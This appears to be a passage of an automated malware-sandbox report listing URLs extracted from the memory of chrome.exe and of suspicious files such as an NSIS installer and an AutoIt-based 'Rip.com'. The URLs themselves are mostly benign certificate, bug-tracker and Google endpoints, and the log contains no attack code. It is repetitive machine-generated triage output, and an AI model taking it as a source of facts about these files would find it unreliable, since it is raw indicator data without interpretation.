    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: CenteredDealing.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Rip.com, 0000000C.00000000.1708125558.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: chromecache_98.19.drString found in binary or memory: http://www.broofa.com
    Source: CenteredDealing.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: 8yu37g.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
    Source: chromecache_95.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_95.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
